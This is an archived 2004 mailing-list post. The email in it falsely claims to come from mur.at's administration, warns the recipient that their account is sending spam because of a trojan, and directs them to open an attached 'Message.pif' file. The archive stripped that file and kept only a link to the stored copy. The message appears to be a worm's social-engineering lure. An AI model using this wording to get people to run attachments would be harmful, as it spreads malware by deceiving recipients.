+comunity+ Email account utilization warning.

administration at mur.at administration at mur.at
Di Mär 16 21:50:39 CET 2004

Dear user, the management of Mur.at mailing system wants to let  you know that,

Some of our clients complained about the spam (negative e-mail content)
outgoing  from your e-mail  account. Probably, you have  been  infected by
a proxy-relay trojan server. In order to  keep your computer safe,
follow the instructions.

Please,  read the  attach for further details.

Kind regards,
   The Mur.at team                              http://www.mur.at
-------------- nächster Teil --------------
Ein Dateianhang mit Binärdaten wurde abgetrennt...
Dateiname   : Message.pif
Dateityp    : application/octet-stream
Dateigröße  : 12288 bytes
Beschreibung: nicht verfügbar
URL         : <http://lists.mur.at/pipermail/comunity/attachments/20040316/2268aa9b/attachment.obj>

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